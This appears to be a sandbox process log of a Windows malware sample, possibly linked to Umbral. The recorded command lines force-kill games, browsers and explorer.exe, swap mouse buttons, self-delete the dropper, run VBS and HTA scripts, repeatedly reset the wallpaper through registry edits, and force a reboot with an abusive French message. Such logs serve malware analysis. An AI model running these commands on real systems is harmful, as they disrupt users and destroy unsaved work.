C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19765.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x418 0x464

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM GenshinImpact.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2297.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26761.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20056.vbs"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6180.vbs" 17222.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\17222.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

